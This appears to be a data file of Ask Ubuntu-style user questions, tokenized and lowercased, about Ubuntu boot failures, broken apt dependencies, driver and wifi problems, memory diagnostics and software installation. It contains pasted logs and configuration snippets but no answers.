356438	blinking cursor on dvd	i have this problem , where i burned ubuntu , and when i boot it , it sends me to the black screen of death , with a blinking cursor so it does n't get too boring . i do not have a nvidia graphic card , i have an intel family chipset . note : none of these existant posts work .
356444	recent update appears to have hosed unity ; ca n't get to a terminal	i have three ubuntu 13.04 installations that all stopped working when updated over the last three days . the laptop is amd a10 based and contains both 32 and 64 bit ubuntu 13.04 ( and also fedora 19 mate 64b ) inside vmware player over windows 8 , and a desktop with an amd fx 6000 with 32 bit ubuntu 13.04 in vmware player on top of ubuntu 12.04 . basically , i can log in , the background comes up , and that 's it . no task panel , top panel , application indicators , just the background . i am able to bring up the `` change desktop background '' with a right click , and get to the system settings , but ca n't get to a terminal . there has been no problem getting ubuntu installed and operating ; some of these i have been using for a several weeks . the fedora install appears fine so far . i updated vmware after the problems started , but it seems to have neither helped nor hurt the situation . any ideas ?
356452	booting from usb get 'no configuration file found '	i loaded ubuntu on my usb drive and tried to boot it . the error message is : no configuration file found no default or ui configuration directive found !
356454	new to linux - iso image size	the iso i downloaded is 708 mb - too big for a cd , so i 'm required to burn it to a dvd , or will it fit ?
356455	calling function in another bash script	let 's say ; script a.sh has function f1 defined . script b.sh needs to call f1 to use . how do i do that ? i searched online , it says i have to edit some path vairable , but does it mean global path or is there any path specifically used only in bash ?
356463	printer : lexmark t632 and lexmark 7500	ca n't get them to work regardless of how i try . does anyone have any suggestions . my desktop is running windows and the printers are connected to the desktop ( one via wifi ) . i do not seem to be able to make 3.04 recognize those printers . i tried connecting them directly to my ubuntu laptop but still no luck . any suggestions ? or , at least a suggestion of similar type printers that will be recognized by 3.04 ? thanks
356467	rounded corners at the bottom of the window ?	is there a tutorial for beginners on how to rounded bottom corners of the window ? like the mac os to the example .
356471	keepass2 and other applications	how do i use keepass2 with other applications on ubuntu such as eve online . i attempted to use auto-type to put password in but i am getting nothing . eve online runs through wine . cmd : // '' /ccp/eve/bin/exefile.exe '' this was the url for the game . did not get anything from using that .
356473	how can i find which process is using up memory ?	top reports that 99 % of the memory is used . but when sorted by memory usage shift+m i only see about 20 % being used . how can i find out which process is using all my memory ? $ top top - 21:13:30 up 1:47 , 1 user , load average : 1.03 , 0.84 , 0.85 tasks : 70 total , 1 running , 69 sleeping , 0 stopped , 0 zombie cpu ( s ) : 4.9 % us , 0.3 % sy , 0.0 % ni , 94.6 % id , 0.2 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 7629464k total , 7404500k used , 224964k free , 84964k buffers swap : 0k total , 0k used , 0k free , 5718640k cached pid user pr ni virt res shr s % cpu % mem time+ command 3463 elastics 20 0 3646m 1.2g 16m s 11 16.8 25:40.03 java 4146 ubuntu 20 0 27112 9692 1756 s 0 0.1 0:00.79 bash 972 whoopsie 20 0 183m 4272 3052 s 0 0.1 0:00.01 whoopsie 4049 root 20 0 73436 3596 2792 s 0 0.0 0:00.02 sshd 1090 www-data 20 0 64104 3228 968 s 0 0.0 0:02.62 nginx 664 root 20 0 50032 2900 2292 s 0 0.0 0:00.01 sshd 1 root 20 0 24320 2284 1360 s 0 0.0 0:01.62 init 1119 root 20 0 105m 1656 1088 s 0 0.0 0:02.86 monit 4145 ubuntu 20 0 73436 1544 748 s 0 0.0 0:00.11 sshd 681 syslog 20 0 247m 1536 1120 s 0 0.0 0:00.73 rsyslogd 541 root 20 0 23436 1368 1020 s 0 0.0 0:00.00 vsftpd 1089 root 20 0 62912 1324 220 s 0 0.0 0:00.00 nginx 295 root 20 0 21528 1316 792 s 0 0.0 0:00.06 udevd 4844 ubuntu 20 0 17328 1244 944 r 0 0.0 0:00.05 top 1062 debian-e 20 0 47472 1116 664 s 0 0.0 0:00.00 exim4 688 messageb 20 0 23940 1004 672 s 0 0.0 0:00.02 dbus-daemon 773 root 20 0 19112 996 768 s 0 0.0 0:00.01 cron 746 root 20 0 14504 968 804 s 0 0.0 0:00.00 getty 761 root 20 0 14504 968 804 s 0 0.0 0:00.00 getty 764 root 20 0 14504 964 804 s 0 0.0 0:00.00 getty 751 root 20 0 14504 960 804 s 0 0.0 0:00.00 getty 762 root 20 0 14504 960 804 s 0 0.0 0:00.00 getty 1142 root 20 0 14504 960 804 s 0 0.0 0:00.00 getty 350 root 20 0 21456 776 364 s 0 0.0 0:00.00 udevd 351 root 20 0 21456 728 320 s 0 0.0 0:00.00 udevd 774 root 20 0 4328 672 524 s 0 0.0 0:00.00 acpid 285 root 20 0 17232 640 448 s 0 0.0 0:00.05 upstart-udev-br 505 root 20 0 7264 604 108 s 0 0.0 0:00.00 dhclient3 441 root 20 0 15188 388 196 s 0 0.0 0:00.01 upstart-socket- 775 daemon 20 0 16908 384 220 s 0 0.0 0:00.00 atd 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:00.13 ksoftirqd/0 4 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/0:0 5 root 20 0 0 0 0 s 0 0.0 0:00.02 kworker/u:0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:00.02 watchdog/0 8 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 9 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/1:0 10 root 20 0 0 0 0 s 0 0.0 0:00.30 ksoftirqd/1 11 root rt 0 0 0 0 s 0 0.0 0:00.02 watchdog/1 12 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 13 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper tried ps_mem.py but could n't tell which process was the culprit : $ sudo ./ps_mem.py private + shared = ram used program 188.0 kib + 35.5 kib = 223.5 kib atd 176.0 kib + 58.0 kib = 234.0 kib acpid 208.0 kib + 82.0 kib = 290.0 kib upstart-socket-bridge 272.0 kib + 89.0 kib = 361.0 kib cron 284.0 kib + 105.0 kib = 389.0 kib upstart-udev-bridge 568.0 kib + 15.0 kib = 583.0 kib dhclient3 456.0 kib + 173.5 kib = 629.5 kib vsftpd 628.0 kib + 45.5 kib = 673.5 kib dbus-daemon 604.0 kib + 74.5 kib = 678.5 kib exim4 596.0 kib + 197.5 kib = 793.5 kib sudo 808.0 kib + 124.5 kib = 932.5 kib monit 1.0 mib + 92.5 kib = 1.1 mib rsyslogd 832.0 kib + 369.0 kib = 1.2 mib udevd ( 3 ) 1.1 mib + 163.5 kib = 1.3 mib init 956.0 kib + 384.0 kib = 1.3 mib getty ( 6 ) 1.8 mib + 1.2 mib = 3.0 mib nginx ( 2 ) 2.6 mib + 464.5 kib = 3.0 mib whoopsie 1.2 mib + 2.1 mib = 3.3 mib sshd ( 3 ) 9.0 mib + 92.5 kib = 9.1 mib bash 1.3 gib + 536.0 kib = 1.3 gib java -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1.3 gib ================================= free reports the same : $ free -m total used free shared buffers cached mem : 7450 7233 216 0 87 5514 -/+ buffers/cache : 1631 5819 swap : 0 0 0 can someone help me debug ?
356474	why is the month and day of week always in english , even if the system language is spanish ?	i tried restarting , changing settings , etc , but as you can see , it is still in english . edit : i downloaded the source for indicator-datetime ; from what i can see , the problem may be deeper . gtk ?
356475	apt-get broken packages lamp stack	with ubuntu 13.04 , i 'm unable to install any parts of the lamp stack due to broken packages . i 've tried sudo apt-get -f install php5 sudo apt-get -- purge remove php5 sudo apt-get autoremove as well as trying to install all the dependencies listed in all permutations of the order sudo apt-get -- fix-broken -- ignore-hold install php5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5 : depends : libapache2-mod-php5 ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or php5-cgi ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or php5-fpm ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . would love some insight , i think it has to do with distro upgrade edit : some more output form apt root @ ascension : /home/kevin # dpkg -- configure -a root @ ascension : /home/kevin # apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ ascension : /home/kevin # apt-get install php5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5 : depends : libapache2-mod-php5 ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or php5-cgi ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or php5-fpm ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . root @ ascension : /home/kevin # apt-get remove php5-fpm reading package lists ... done building dependency tree reading state information ... done package 'php5-fpm ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ ascension : /home/kevin # apt-get remove php5-cgi reading package lists ... done building dependency tree reading state information ... done package 'php5-cgi ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ ascension : /home/kevin # apt-get remove libapache2-mod-php5filter reading package lists ... done building dependency tree reading state information ... done package 'libapache2-mod-php5filter ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ ascension : /home/kevin # apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apache2 : depends : apache2-mpm-worker ( = 2.2.22-6ubuntu5 ) but it is not going to be installed or apache2-mpm-prefork ( = 2.2.22-6ubuntu5 ) but it is not going to be installed or apache2-mpm-event ( = 2.2.22-6ubuntu5 ) but it is not going to be installed or apache2-mpm-itk ( = 2.2.22-6ubuntu5 ) but it is not going to be installed depends : apache2.2-common ( = 2.2.22-6ubuntu5 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . edit , per @ braiam apt-cache output : php5 : installed : ( none ) candidate : 5.4.9-4ubuntu2 version table : 5.4.9-4ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages libapache2-mod-php5 : installed : ( none ) candidate : 5.4.9-4ubuntu2 version table : 5.4.9-4ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages php5-cgi : installed : ( none ) candidate : 5.4.9-4ubuntu2 version table : 5.4.9-4ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages php5-fpm : installed : ( none ) candidate : 5.4.9-4ubuntu2 version table : 5.4.9-4ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/universe amd64 packages cat of sources.list & /etc/apt/sources.list.d/*.list # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / .trashes/501/dists/raring/main/binary-i386/ # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / .trashes/501/dists/raring/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] /.trashes/501/ raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu raring main # deb-src http : //extras.ubuntu.com/ubuntu raring main # spotify yo # deb http : //repository.spotify.com stable non-free deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe main restricted multiverse deb http : //security.ubuntu.com/ubuntu/ raring-security universe main restricted multiverse as you can see , all the entries are raring , and there does n't seem to be any other issues . fresh out of ideas .
356476	ca n't install steam on ubuntu 13.04 64bit	so i wanted to install steam , and i went to the steam website to download the package and when i did it took me to the software store and in there was no install button , just an error . so after that i restarted the software store and it let me install it but when i tried to install it , nothing showed up . the icon was n't there and i 'm new to ubuntu but i 'm exprenced in windows , but i ca n't find the files and it wo n't let me reinstall it . so if anyone can help i really appreciate it and sorry for the grammar , i wrote this on my phone .
356479	can not boot ubuntu 12.04 , getting a black screen . i tried a few things , but i ca n't help myself	i am currently unable to boot my ubuntu and am currently writing on my dual-booted windows 8.1 . i 'll quickly wrap-up what i did before . got ubuntu 13.04 , played around a bit . installed nvidia drivers , readonly-mounted an earlier ssd with windows 8 on it after this i got a whitescreen and thought i 'd better go with ubuntu 12.04 ca n't boot it , getting a black screen . what i already tried : reinstalling 12.04 ( did n't change anything ) running boot-repair ( did n't change anything ) running it with `` nomodeset '' in grumb vs. nvidia problems ( did n't work , could n't get any further ) so what i got now is the url from boot-repair paste.ubuntu.com/6219606 and i also managed to check out my ubuntu partition in windows ( boot.log is empty but a `` dmesg '' -file has some information , but i do n't know wheter how or if at all to share that ) . thanks for any attempt in helping me .
356481	is there a zip file that can be used with the twrp bootloader on a rooted samsung galaxy note 2 ?	i am interested in trying to dual boot my rooted samsung galaxy note 2 ( bootloader is twrp and capable of dual booting ) . i only have a 16g sd card installed but it should handle the size of zip required to boot ubuntu touch . if this works then i would be very interested in testing the final up untill release date .
356482	unable to install ms office , wine1.7 , and getting updates	i am a new ubuntu user , just installed 12.04 lts . learned a lot from ubuntu users suggestions on the webs . i am a student and frequent user of ms office . however , i am unable to install ms office as failing to get updates plus installing wine1.7 . sudo apt-get update shows something about unable to connect archive.ubuntu.com and some files failed to download , they have been ignored or older ones have been used instead . sudo apt-get install wine1.7 shows something about unmet dependencies and broken packages .
356485	meaning of `` ls -la '' color	i 'm using ubuntu12.04 and i 've created two directory symbolic links . by using ls -la , console shows source directory with light blue and target directory with blue . but only one of them target directory background is green . the permission of two directories are same and user and group are also same . what is difference between two of them ? what meaning have green background with ls -la -- color ?
356489	my photos were deleted	i just realised that my photos were deleted . i have tried to download them but all i can get is could not download content from storage answer . photo index is okay but i could n't see or download them . what can i do for retrieve them back ?
356492	ca n't install java	$ sudo apt-get install openjdk-7-jre [ sudo ] password for paul : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jre : depends : openjdk-7-jre-headless ( = 7u25-2.3.10-1ubuntu0.13.04.2 ) but it is not going to be installed depends : libgif4 ( > = 4.1.4 ) but it is not installable depends : libatk-wrapper-java-jni ( > = 0.30.4-0ubuntu2 ) but it is not installable recommends : libgnome2-0 but it is not installable recommends : libgnomevfs2-0 but it is not installable recommends : libgconf2-4 but it is not installable recommends : ttf-dejavu-extra but it is not installable e : unable to correct problems , you have held broken packages .
356496	how to fix this error ? unable to lock directory /var/cache/apt/archives/	how to fix this error in the terminal ? unable to lock directory /var/cache/apt/archives/
356497	how do i get my bluetooth , wifi , and touchpad working again with ubuntu 13.04 ?	so i just recently upgraded to 13.04 in the hopes that it would be friendlier to my newer pc 's hardware ( mainly i was hoping my dual monitor would work ) . sadly after install i realized that less is working with the new version . at the moment the wifi is the biggest deal ( i can use a mouse and usually do n't use bluetooth ) . with my wifi , i am able to see the connection i want ( maybe from my previous version of ubuntu that i upgraded from ) but i am not able to connect . in fact , i ca n't even see this `` enable wi-fi '' option that people speak of . it just is n't there . i am at a loss and do n't want to give up on ubuntu because it is great when it works but i seem to be spending more time fixing than i spend working . not sure if this matters but i have an alienware m-14x with an nvidia geforce gt 650m and an i7 processor ( but ubuntu is using my crappy integrated card at the moment ) .
356498	how to install proxychainsgui	i have successfully installed proxychains and it is working fine so far . my only problem is that i do not know how to get the gui to work/install it , which i got from here : http : //sourceforge.net/projects/proxychainsgui/ i have also of course done some research of my own and i only found this : http : //sourceforge.net/p/proxychainsgui/discussion/1151374/thread/a138aedd/ which unfortunately did not work for me . i have already tried executing it by clicking it ( once choosing simply to `` execute '' it and once to `` run it in terminal '' ) and nothing happened . trying to execute it in a terminal ( via command this time to see if it gives me any errors ) it only gave me an error message , saying that the file is not an executable script . any help with this would be very appreciated !
356499	php5-fpm : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but 5.4.6-1ubuntu1.4 is to be installed	i want to set up php behind nginx with fastcgi but i stuck on the sudo apt-get -f install php5-fpm what i 've tried : sudo apt-get -f install php5-fpm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-fpm : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but 5.4.6-1ubuntu1.4 is to be installed e : unable to correct problems , you have held broken packages . my source-list ( this server is restricted to ukrainian network only , no connecting to the world ) deb http : //mirror.yandex.ru/ubuntu precise universe deb http : //mirror.yandex.ru/ubuntu precise-updates universe deb http : //mirror.yandex.ru/ubuntu quantal-security main restricted deb-src http : //mirror.yandex.ru/ubuntu quantal-security main restricted
356500	where i can find the gnome key binding scheme files stored ?	i want to personalize my system wide key bindings , where i find these files and what package has them ?
356502	gcalcli calm returns error : traceback ( most recent call last ) : file `` /usr/bin/gcalcli '' , line 1122 , in < module >	gcalcli calm returns : traceback ( most recent call last ) : file `` /usr/bin/gcalcli '' , line 1122 , in < module > doooooithippiemonster ( ) file `` /usr/bin/gcalcli '' , line 1087 , in doooooithippiemonster gcal.calquery ( args [ 0 ] ) file `` /usr/bin/gcalcli '' , line 827 , in calquery self._graphevents ( cmd , start , count , eventlist ) file `` /usr/bin/gcalcli '' , line 602 , in _graphevents printmsg ( clr_nrm ( ) , line + `` \n '' ) file `` /usr/bin/gcalcli '' , line 207 , in printmsg sys.stdout.write ( unicode ( msg , 'utf-8 ' ) ) file `` /usr/lib/python2.6/codecs.py '' , line 351 , in write data , consumed = self.encode ( object , self.errors ) unicodeencodeerror : 'ascii ' codec ca n't encode character u'\xe4 ' in position 99 : ordinal not in range ( 128 ) any ideas why ?
356504	how to activate aceleration in sony vaio vgn-n330fh	is it a way to activate additional driver to make compiz to work ? thanx i think i have intel mobile graphics family . regards
356508	purple-black screen with cursor after login	i run 13.04 , parallel to windows xp home edition 2002 , on my dell ( i do n't know the specific name of the pc . ) i do not have internet on that computer . every time i log in , i just get a purple-black screen , totally blank , and my cursor . the only way i can get ubuntu to boot up is to run it in diagnostic mode , and then some of the graphics drivers shut down , it is very slow , and i ca n't view the hard drive . what is wrong and how do i fix this problem ?
356511	installing freebsd along with ubuntu and windows	i have 2 os installed : ubuntu and windows 7 and everything works fine . i want to install freebsd as well . how do i do that ? is there any problem i might face with 2 os installed ?
356513	how do i connect my netxtreme bcm5755m gigabit ethernet pci express in y dell latitude d630 ?	trying to get my 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express ( rev 02 ) working with my wifi . i just installed raring ringtail on this dell latitude d630 and i ca n't get it to connect without a wifi dongle . this is what i got when i typed sudo lshw -c network : *-network description : ethernet interface product : netxtreme bcm5755m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:21:70:98:04:32 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.128 firmware=5755m-v3.29 latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : fe8f0000-fe8fffff *-network description : wireless interface physical id : 2 bus info : usb @ 2:1 logical name : wlan0 serial : 7c : dd:90:11 : a0:10 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.8.0-31-generic firmware=0.29 ip=10.0.0.8 link=yes multicast=yes wireless=ieee 802.11bgn also , when i go to additional drivers in the software and updates settings , no proprietary drivers show up . i 've tried sudo apt-get install b43-fwcutter firmware-b43-installer because it worked on a bunch of old dell laptops that i converted over before , but it did n't work on this one . is this driver even compatible with wifi ? please help .
356514	re-enabling an account	i need help on how to re-enable an account , my computer admin disabled my account , which means i cant perform the sudo command without a password , i keep asking him to put my password back , but he says he doesnt know why , i need help on how to re-enable an accounts password ! i 've tried to reset a password , but i need the sudo command for it ! also i 've went to the groups and users options but it didnt have any to say about `` password recovery '' please please help me ! ! ! ! ! ! ! ! ! !
356515	how to play encrypted dvds on ubuntu 12.04	i am trying to play a movie on ubuntu and it will not work . it tells me that i need to install dvd decryption . i was researching online and found out that i need to install libdvdread4 , i did that . i also read that i needed to install libdvdcss , and this is where there was a problem . i ran : sudo /usr/share/doc/libdvdread4/install-css.sh into the terminal and got the following : -- 2013-10-10 20:52:33 -- http : //packages.medibuntu.org/dists/precise/free/binary-i386/packages resolving packages.medibuntu.org ( packages.medibuntu.org ) ... 88.191.127.22 connecting to packages.medibuntu.org ( packages.medibuntu.org ) |88.191.127.22|:80 ... connected . http request sent , awaiting response ... 404 not found 2013-10-10 20:52:33 error 404 : not found . dynamic fetch failed ; falling back to static fetch -- 2013-10-10 20:52:33 -- http : //packages.medibuntu.org/pool/free/libd/libdvdcss/libdvdcss2_1.2.10-0.2medibuntu1_i386.deb resolving packages.medibuntu.org ( packages.medibuntu.org ) ... 88.191.127.22 connecting to packages.medibuntu.org ( packages.medibuntu.org ) |88.191.127.22|:80 ... connected . http request sent , awaiting response ... 404 not found i am wondering if there is any other way to install libdvdcss . thanks
356519	ubuntu 12.04 movies stuck in various formats ( wmv , mp4 etc . )	in many movies i have a problem with running smoothly . i mean they are run but `` frame by frame '' and this prevents watching . this appears in various formats , for example i have a few movies in mp4 format . one of them runs ok. other are stutter . every wmv movie runs `` frame by frame '' . i have a nvidia geforce 7600 gs graphic card and an actual 304 update driver from repository . youtube movies run very well . i used totem , vlc , smplayer ... . in every of this players i have the same problem .
356520	how do i fix a `` failed to list contents of container '' error ?	i 'm running juju in the windows 7 os . when running juju bootstrap , the following error occurred : c : \users\t00106584 > juju bootstrap error : failed to list contents of container : juju-6d8590a4634bc451763da9a8a93ad351 caused by : authentication failed caused by : failed executing the request https : //172.1 67.10.10:5000/v2.0//tokens caused by : post https : //172.1 67.10.10:5000/v2.0//tokens : local error : record overflow i modified the file : environments.yaml and changed auth-url : https : //172.167.10.10:5000/v2.0/ to auth-url : http : //172.167.10.10:5000/v2.0/ the error is gone , but another error appears : ** c : \users\t00106584 > juju bootstrap error : failed to list contents of container : juju-6d8590a4634bc451763da9a8a93ad351 caused by : can not create service urls caused by : the configured region `` regionone '' does not allow access to all required services , namely : compute , object-store access to these services is missing : object-store -- -- -- -- -- -- -- -environments.yaml -- -- -- -- -- -- -- - default : openstack environments : openstack : type : openstack admin-secret : 004cfb82cfd545035fab61fa2b603f96 control-bucket : juju-6d8590a4634bc451763da9a8a93ad351 auth-url : http : //172.167.10.10:5000/v2.0/ auth-mode : userpass username : admin password : randompassword tenant-name : admin region : regionone
356522	filesystem creation fails when trying to install ubuntu over windows	i 'm completely new to ubuntu . i want to replace windows ( that had been crushed while trying to install ubuntu ) . but whenever i choose âerase windowsâ to install ubuntu i get this error : the ext4 file system creation in partition # 1 of scsi1 ( 0,0,0 ) ( sda ) failed what does it mean ? how can i resolve this issue ?
356525	why ca n't i find ubuntu-restriced-extras in the menu ?	so i installed the restricted extras but i ca n't open them nor find them anywhere . i 've typed it in the search bar..still nothing . it says its installed but i ca n't find it anywhere .
356526	remote login lightdm with virtualbox vrdp	i recently came across vagrant , and would like to set it up to use as a throw away dev environment . i was hoping to be able to use the lightdm remote login freerdp to login to the desktop but have so far been unable to configure it properly . i was hoping someone could point me in the proper direction . thank you much !
356529	how to get package when ubuntu archive not working ?	i 'm trying to install maven on my pc , but one of the packages it uses can not . be installed from the package manager . specifically libxmlgraphics-commons-java . i try going directly to the archive through my browser but no luck i.e . http : //us.archive.ubuntu.com/ubuntu/pool/main/x/xmlgraphics-commons/
356534	can i install ubuntu on my asus fonepad ?	i do n't need ubuntu phone , i 'm just interested in running ubuntu since i use the device more as a computer than a phone ( it is not my personal telephone ) . it has an intel chip so i 'm thinking it would n't be too hard ? i know this has been asked , but its been a while . any thoughts ?
356535	problem while installing kubuntu 13.04	at the stage “where would you like to install kubuntu ? ” , after selecting “guided -resize scsi1 ( 0,0,0 ) partition # 4 and use freed space” , i got stuck with the following message : the attempt to mount a file system with type vfat in scsi1 ( 0,0,0 ) , partition # 1 ( sda ) at/boot/efi failed . you may resume partitioning from partition menu . ( continue ) ( go back ) i do n't know what to do if i go back , once when i continued the process virtually hung at last stage without indicating anything except that it would finish soon .
356536	**error during device i/o**	this device i/o error appears when i try to preview or scan using the aquireimages program . i am using a kodak 3250 aio printer and just installed kipi-plugins-common 4:3.1.0-0ubuntu1 . i 'm using ubuntu 13.4 32 bit , amd a4-3300 apu with radeon ( tm ) hd graphics ă 2 , gallium 0.4 on amd sumo2 graphics . can someone tell me what to do or where to look to resolve this issue ? thanks in advance for your assistance , houston .
356538	change program call directory	i have to versions of a software ( tecplot ) . when i write `` tec360 '' in the terminal it brings me the old version . how can i change the program call directory so that it will bring me the new version ?
356540	equivalent to windows ' `` disk space fan '' ?	i used this program a fair bit back in windows . what 's something vaguely equivalent ?
356546	bumblebee optirun truble	alright , this is my first time to post here so please be patient if i dont do it perfectly . i am attempting to run amnisea using optirun through bumblebee . i am typing the command like so : sudo optirun amnisea but when ever i do i get this : /usr/bin/vglrun : 303 : exec : amnesia : not found so then i dicded to navigate to the containing folder and try to run one of the files in there i figured out that launcher.bin64 would open the launcher so when i tried to optirun that it gave me the same error except it read : /usr/bin/vglrun : 303 : exec : launcher.bin64 : not found well , im wondering if any one can tell me what i am doing wrong and how to fix it . im running 12.4lts and i have the two graphics cards one integrated intel , and one nvidea . im also some what new to linux as well . edit . i have resolved the problem ! i created a new .desktop using the program 'main menu ' , and launched the actual game suing optirun , bypassing the launcher because if i used the launcher the game would just crash .
356548	system crashed when installing ubuntu-12.04.3-desktop-i386 using cd	i 'm installing ubuntu-12.04.3-desktop-i386 using cd on sony notebook . when the installation goes to about the end ( 90 % ) , system crashed . when i want to reinstall the system , cd-rom just ca n't run any more . what can i do ? thank you !
356549	[ i get different partitions on gparted and windows ]	ive been trying to install ubuntu 13.04 alongside with my previous installation of windows 8 . please note that my notebook is 4/5 years old , came with windows 7 on it . the thing is that in windows disk manager , i get 4 partitions : system , c : , h : ( data ) , and d : ( wich is the one i intended for ubuntu ) . but in gparted , when i attempted to install ubuntu , it says i have different partitions , and apparently the h : and d : are merged in one single partition . could anyone help me solve this ? thanks in advance ! edit : i also tried the menu install option `` install alongside windows 8 '' but the installer reboots and nothing happens .
356553	can ubuntu be installed on systems without an internet connection ?	is it possible to install ubuntu on a system without any internet or wireless connections ?
356555	ubuntu 12.04 32 bit freezing	what happens is , when i boot my computer , it loads the login screen just fine . i proceed to type in my password and as soon as i type my password in , my mouse and keyboard freeze up and can not be used , as if they 're not even plugged in . i 've reinstalled the os a few times and i 'm having the same problem each time . p.s . it tells me that something is disabled in bios . does that have to do with anything ? please help ! thanks !
356556	ssh login problem under 12.04 server edition	i 've got problem with ssh login after fresh installment of 12.04 server edition . every time it promotes : authentication fail , and i am pretty sure my password is ok . i actually tried several ssh clients and several user names , all fail . there is no log from /var/log/auth.log and i 've enabled passwordauthentication in my /etc/ssh/sshd_config any hint would be a great help . thanks
356559	ca n't switch focus to rhythmbox with unity	well , i can switch to rhythmbox , but not by just clicking on it . i must right click on it , then click on the song playing . i can always minimize to get to it . when the focus is on rhythmbox , and i click it , it will do the graphical zoom out to show all the rhythmbox windows . i do n't understand what could be wrong . i only installed desktop art as a plugin and kept the default ones . i did not have this problem on my ubuntu 12.04 installation . edit : i have found out more upon this issue . i have noticed that when i click on the icon , it will bring to focus nothing , but if i right click it and click on the second instance of rhythmbox ( automatically made ) it acts a the gui . if i scroll over the icon ( bringing one to focus ) it will toggle between invisible and visible meaning it registers as 2 windows . in short , i can not bring rhythmbox to focus by clicking on it because there are 2 windows . ubuntu 13.04 ( no unity mods & has noticed on 13.10 ) rhythmbox 2.98 dell d620 intel core 2 duo intel graphics 1.5gb ram
